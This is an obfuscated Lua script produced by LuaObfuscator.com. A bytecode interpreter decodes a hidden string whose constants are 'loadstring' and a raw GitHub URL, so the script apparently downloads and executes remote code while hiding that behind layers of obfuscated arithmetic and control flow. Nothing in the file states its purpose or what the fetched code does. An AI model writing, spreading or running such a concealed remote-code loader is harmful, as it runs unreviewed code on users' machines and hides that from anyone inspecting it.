--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v30,16));if v19 then local v132=0;local v133;while true do if (v132==1) then return v133;end if (v132==0) then v133=v5(v90,v19);v19=nil;v132=1;end end else return v90;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v91=0 -0 ;local v92;while true do if (v91==(0 -0)) then v92=(v31/((3 -1)^(v32-1)))%(((2596 -(892 + 65)) -(1523 + 114))^(((v33-(1 + 0)) -(v32-(2 -(1 -0)))) + (620 -(555 + 64)))) ;return v92-(v92%(1271 -(226 + 1044))) ;end end else local v93=(8 -6)^(v32-(932 -((1573 -716) + 74))) ;return (((v31%(v93 + v93))>=v93) and (569 -((717 -(87 + 263)) + (479 -278)))) or (927 -(214 + 713)) ;end end local function v21() local v34=180 -(67 + (449 -336)) ;local v35;while true do if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (953 -(802 + 150)) ;v34=2 -1 ;end if (v34==(1 + 0)) then return v35;end end end local function v22() local v36=997 -(915 + 82) ;local v37;local v38;while true do if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (3 -1) ;v36=1 + 0 ;end if (v36==(2 -1)) then return (v38 * (559 -(53 + 250))) + v37 ;end end end local function v23() local v39=0;local v40;local v41;local v42;local v43;while true do if (v39==(1 -0)) then return (v43 * (7142367 + 9500629 + 134220)) + (v42 * (66327 -(368 + (747 -324)))) + (v41 * (804 -548)) + v40 ;end if (v39==(18 -(10 + 8))) then v40,v41,v42,v43=v1(v16,v18,v18 + (11 -8) );v18=v18 + (446 -(416 + 26)) ;v39=(441 -(145 + 293)) -2 ;end end end local function v24() local v44=430 -(44 + 386) ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==((7 -5) + 1)) then if (v49==(1486 -(998 + 488))) then if (v48==(0 + 0)) then return v50 * (0 + 0) ;else v49=773 -(201 + 571) ;v47=766 -(745 + 21) ;end elseif (v49==(705 + 1342)) then return ((v48==(0 -0)) and (v50 * ((1139 -(116 + 1022))/(0 -0)))) or (v50 * NaN) ;end return v8(v50,v49-(601 + 422) ) * (v47 + (v48/((7 -5)^(184 -132)))) ;end if (v44==(860 -(672 + 142 + 45))) then v47=(1181 -(1123 + 57)) + 0 + 0 ;v48=(v20(v46,2 -1 ,49 -29 ) * ((1 + 1)^(12 + 20))) + v45 ;v44=(957 -(163 + 91)) -(376 + 325) ;end if (v44==(0 -(1930 -(1869 + 61)))) then v45=v23();v46=v23();v44=886 -(73 + 188 + 624) ;end if (v44==(5 -3)) then v49=v20(v46,21,54 -23 );v50=((v20(v46,112 -80 )==((1659 -578) -(1020 + 60))) and  -(15 -(9 + 5))) or (1424 -(630 + 793)) ;v44=9 -6 ;end end end local function v25(v51) local v52;if  not v51 then v51=v23();if (v51==0) then return "";end end v52=v3(v16,v18,(v18 + v51) -(1 + 0) );v18=v18 + v51 ;local v53={};for v70=1 -0 , #v52 do v53[v70]=v2(v1(v3(v52,v70,v70)));end return v6(v53);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101) local v94=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v94~= #"<") then else if (v95== #"/") then v96=(function() return v97()~=0 ;end)();elseif (v95==2) then v96=(function() return v98();end)();elseif (v95== #"nil") then v96=(function() return v99();end)();end v100[v101]=(function() return v96;end)();break;end if (v94==(1587 -(412 + 1175))) then local v125=(function() return 0 -0 ;end)();local v126=(function() return;end)();while true do if (v125~=(0 + 0)) then else v126=(function() return 0 + 0 ;end)();while true do if (v126==1) then v94=(function() return  #"]";end)();break;end if (v126==0) then v95=(function() return v97();end)();v96=(function() return nil;end)();v126=(function() return 1 -0 ;end)();end end break;end end end end return v94,v95,v96,v97,v98,v99,v100,v101;end;end)();local v55=(function() return function(v102,v103,v104,v105,v106,v107,v108,v109,v110) local v111=(function() return 1274 -(388 + 886) ;end)();local v102=(function() return;end)();local v103=(function() return;end)();while true do local v119=(function() return 0 -0 ;end)();while true do if (v119~=(0 + 0)) then else if (1==v111) then local v134=(function() return 0;end)();while true do if (0==v134) then while true do if ((560 -(306 + 254))==v102) then v103=(function() return v104();end)();if (v105(v103, #"}", #":")==(0 + 0)) then local v154=(function() return 0 -0 ;end)();local v155=(function() return;end)();local v156=(function() return;end)();local v157=(function() return;end)();while true do if (v154~=(1467 -(899 + 568))) then else local v158=(function() return 0 + 0 ;end)();local v159=(function() return;end)();while true do if (v158==0) then v159=(function() return 0;end)();while true do if (v159~=1) then else v154=(function() return 2 -1 ;end)();break;end if (v159==0) then v155=(function() return v105(v103,2, #"xxx");end)();v156=(function() return v105(v103, #".com",6);end)();v159=(function() return 604 -(268 + 335) ;end)();end end break;end end end if (2~=v154) then else if (v105(v156, #"~", #"{")~= #".") then else v157[292 -(60 + 230) ]=(function() return v108[v157[2]];end)();end if (v105(v156,2,574 -(426 + 146) )== #"~") then v157[ #"asd"]=(function() return v108[v157[ #"asd"]];end)();end v154=(function() return 3;end)();end if (v154==(1 + 0)) then local v160=(function() return 1456 -(282 + 1174) ;end)();while true do if (v160~=(812 -(569 + 242))) then else v154=(function() return 5 -3 ;end)();break;end if (v160==0) then v157=(function() return {v106(),v106(),nil,nil};end)();if (v155==(1024 -(706 + 318))) then local v165=(function() return 1251 -(721 + 530) ;end)();local v166=(function() return;end)();while true do if ((1271 -(945 + 326))~=v165) then else v166=(function() return 0;end)();while true do if (v166==(0 -0)) then v157[ #"gha"]=(function() return v106();end)();v157[ #".dev"]=(function() return v106();end)();break;end end break;end end elseif (v155== #"/") then v157[ #"asd"]=(function() return v107();end)();elseif (v155==(2 + 0)) then v157[ #"xnx"]=(function() return v107() -((702 -(271 + 429))^16) ;end)();elseif (v155~= #"nil") then else local v171=(function() return 0 + 0 ;end)();while true do if (v171~=(1500 -(1408 + 92))) then else v157[ #"gha"]=(function() return v107() -(2^16) ;end)();v157[ #"xnxx"]=(function() return v106();end)();break;end end end v160=(function() return 1;end)();end end end if (v154==3) then if (v105(v156, #"-19", #"19(")== #".") then v157[ #"0836"]=(function() return v108[v157[ #"asd1"]];end)();end v109[v110]=(function() return v157;end)();break;end end end break;end end return v102,v103,v104,v105,v106,v107,v108,v109,v110;end end end if (v111==(1086 -(461 + 625))) then local v135=(function() return 0;end)();local v136=(function() return;end)();while true do if (0==v135) then v136=(function() return 0;end)();while true do if (v136~=1) then else v111=(function() return 1;end)();break;end if ((1288 -(993 + 295))~=v136) then else v102=(function() return 0 + 0 ;end)();v103=(function() return nil;end)();v136=(function() return 1172 -(418 + 753) ;end)();end end break;end end end break;end end end end;end)();local v56=(function() return function(v112,v113,v114) local v115=(function() return 0;end)();while true do if (v115~=(0 + 0)) then else local v127=(function() return 0;end)();while true do if (v127==(0 + 0)) then v112[v113-#"/" ]=(function() return v114();end)();return v112,v113,v114;end end end end end;end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {};end)();local v60=(function() return {v57,v58,nil,v59};end)();local v61=(function() return v23();end)();local v62=(function() return {};end)();for v72= #"\\",v61 do FlatIdent_981A3,Type,Cons,v21,v24,v25,v62,v72=(function() return v54(FlatIdent_981A3,Type,Cons,v21,v24,v25,v62,v72);end)();end v60[ #"xnx"]=(function() return v21();end)();for v73= #"}",v23() do FlatIdent_43862,Descriptor,v21,v20,v22,v23,v62,v57,v73=(function() return v55(FlatIdent_43862,Descriptor,v21,v20,v22,v23,v62,v57,v73);end)();end for v74= #"!",v23() do v58,v74,v28=(function() return v56(v58,v74,v28);end)();end return v60;end local function v29(v64,v65,v66) local v67=v64[1 + 0 + 0 ];local v68=v64[322 -(53 + 267) ];local v69=v64[1 + 2 ];return function(...) local v75=v67;local v76=v68;local v77=v69;local v78=v27;local v79=530 -(406 + 123) ;local v80= -(414 -(15 + 398));local v81={};local v82={...};local v83=v12("#",...) -(1 + (0 -0)) ;local v84={};local v85={};for v116=1322 -(1249 + 73) ,v83 do if (v116>=v77) then v81[v116-v77 ]=v82[v116 + 1 + 0 ];else v85[v116]=v82[v116 + (1146 -(466 + 679)) ];end end local v86=(v83-v77) + (2 -1) ;local v87;local v88;while true do v87=v75[v79];v88=v87[1];if ((v88<=((1605 -(239 + 514)) -(20 + 830))) or (801>=4412)) then if ((v88<=(0 + 0)) or (3151<1284)) then local v128=0 -0 ;local v129;while true do if (v128==(126 -(41 + 75 + 10))) then v129=v87[1 + 1 ];v85[v129](v85[v129 + (739 -(542 + 196)) ]);break;end end elseif (v88==((3230 -(797 + 532)) -(106 + 1794))) then do return;end else v85[v87[1 + 1 ]]=v87[2 + 1 ];end elseif ((v88<=(2 + 1)) or (1850==1529)) then v85[v87[1 + 1 + 0 ]]=v66[v87[8 -5 ]];elseif (v88>(10 -6)) then v85[v87[116 -(4 + 110) ]]={};else local v141=(198 + 386) -(57 + 527) ;local v142;while true do if ((821<2123) and (v141==((3364 -1933) -(41 + 1386)))) then v79=v79 + 1 ;v87=v75[v79];do return;end break;end if (v141==(104 -(17 + 86))) then v87=v75[v79];v85[v87[2 + 0 ]]=v66[v87[6 -3 ]];v79=v79 + (2 -1) ;v141=168 -(122 + 44) ;end if ((902<2325) and ((0 -0)==v141)) then v142=nil;v85[v87[6 -4 ]]={};v79=v79 + 1 + 0 ;v141=(1203 -(373 + 829)) + 0 ;end if ((858<=2962) and (v141==(5 -2))) then v87=v75[v79];v142=v87[3 -1 ];v85[v142](v85[v142 + ((797 -(476 + 255)) -(30 + 35)) ]);v141=3 + 1 ;end if (v141==(1259 -(1043 + (1344 -(369 + 761))))) then v87=v75[v79];v85[v87[7 -5 ]]=v87[6 -3 ];v79=v79 + (1213 -(187 + 136 + 889)) ;v141=7 -4 ;end end end v79=v79 + (581 -(361 + 219)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!023Q00030A3Q006C6F6164737472696E6703443Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F5Q6134323334322F6F627364612F726566732F68656164732F6D61696E2F6100054Q00047Q00122Q000100013Q00122Q000200026Q0001000200016Q00017Q00",v9(),...);
